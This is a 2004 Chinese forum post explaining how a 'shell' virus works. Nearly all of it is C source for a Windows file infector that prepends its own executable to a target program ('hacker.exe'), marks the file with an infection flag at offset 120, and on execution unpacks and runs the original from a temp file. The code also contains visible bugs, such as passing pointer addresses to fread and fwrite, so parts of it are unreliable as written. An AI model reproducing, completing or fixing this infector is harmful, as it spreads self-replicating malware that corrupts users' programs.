‹‹ 上一主题 | 下一主题 ››
发新话题
打印

外壳病毒原理

GOD_Father

版主

Rank: 7Rank: 7Rank: 7

冰点≠0℃
1# 发表于 2004-6-21 16:52  只看该作者

外壳病毒原理

别的不说了,看代码就知道了,本来用文件映射的,可是老是出现无效句柄只能用笨办法了!请各位指教

//bindVirus.c

//Author:leonshoh

#include <stdio.h>
#include <windows.h>

char flag[]="virus";

BOOL Isinfect(char *file,char *flag)
{
   FILE *fp;
   char buffer[6];
   buffer[5]=0x0;
   fp=fopen(file,"rb");
   if(fp)
   {
fseek(fp,120,0);
     fread(buffer,sizeof(char),5,fp);
if(!strcmp(buffer,flag))
return TRUE;
else
return FALSE;
     fclose(fp);
   }
}

BOOL infect(char *file,char *flag,char *viruscode,DWORD virussize)
{
FILE *fp,*fp1;
char *buffer;
DWORD i=0,j,k,low;
fp1=fopen(file,"rb");
if(fp1)
{
fseek(fp1,0,2);
low=ftell(fp1);
j=low;
buffer=(char *)malloc(low);
fseek(fp1,0,0);
while(j>i)
  {
  k=fread(&buffer,sizeof(char),j-i,fp1);
  i=i+k;
  }
  fclose(fp1);
}

    fp=fopen("temp.temp$","wb");
if(fp)
{
i=0;
      j=virussize;
  while(j>i)
  {
  k=fwrite(&viruscode,sizeof(char),j-i,fp);
  i=i+k;
  }
  i=0;
  j=low;
  fseek(fp,0,2);
  while(j>i)
  {
  k=fwrite(&buffer,sizeof(char),j-i,fp);
  i=i+k;
  }
  fseek(fp,120,0);
  fwrite(flag,sizeof(char),sizeof(flag)+1,fp);
  fclose(fp);
}
unlink(file);
rename("temp.temp$",file);
}

BOOL UnbindFile(char *file,DWORD virussize,DWORD filesize)
{
FILE *fp,*fp1;
char TempPath[MAX_PATH];
char NewFile[256];
DWORD i,j,k;
char *buffer;
STARTUPINFO StartupInfo;
PROCESS_INFORMATION ProcessInformation;
GetTempPath(MAX_PATH,TempPath);
GetStartupInfo(&StartupInfo);
    GetTempFileName(TempPath,"vir",256,NewFile);
fp=fopen(file,"rb");
    fp1=fopen(NewFile,"wb");
if(fp)
{
fseek(fp,virussize,0);
i=0;
j=filesize-virussize;
buffer=(char *)malloc(j);
        while(j>i)
  {
  k=fread(&buffer,sizeof(char),j-i,fp);
  i=i+k;
  }
if(fp1)
{
i=0;j=filesize-virussize;
        while(j>i)
  {
  k=fwrite(&buffer,sizeof(char),j-i,fp1);
  i=i+k;
  }
}
fclose(fp1);
fclose(fp);
}
CreateProcess(NewFile,NULL,NULL,NULL,FALSE,0,NULL,NULL,&StartupInfo,&ProcessInformation);
WaitForSingleObject(ProcessInformation.hProcess,INFINITE);
unlink(NewFile);
}


void main(int argc,char **argv)
{
FILE *fp;
DWORD filesize;
char *viruscode;
DWORD i=0,k;
fp=fopen(argv[0],"rb");
    if(fp){
fseek(fp,0,2);
filesize=ftell(fp);
viruscode=(char *)malloc(filesize);
fseek(fp,0,0);
while(filesize>i)
{
k=fread(&viruscode,sizeof(char),filesize-i,fp);
i=i+k;
}
fclose(fp);
}
if(Isinfect(argv[0],flag))
{
UnbindFile(argv[0],4640,filesize);
}
else
{
infect("hacker.exe",flag,viruscode,4640);
}
}

本文由GOD_Father 发布于Linuxsky 论坛,网址:http://bbs.linuxsky.org/thread-587-1-1.html

搜索更多相关主题的帖子: 外壳 char windows buffer 原理

====================
夜,给了我黑色的眼睛;
我却用它来寻找光明,
寻找光明……

zyl508@163.com
====================

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题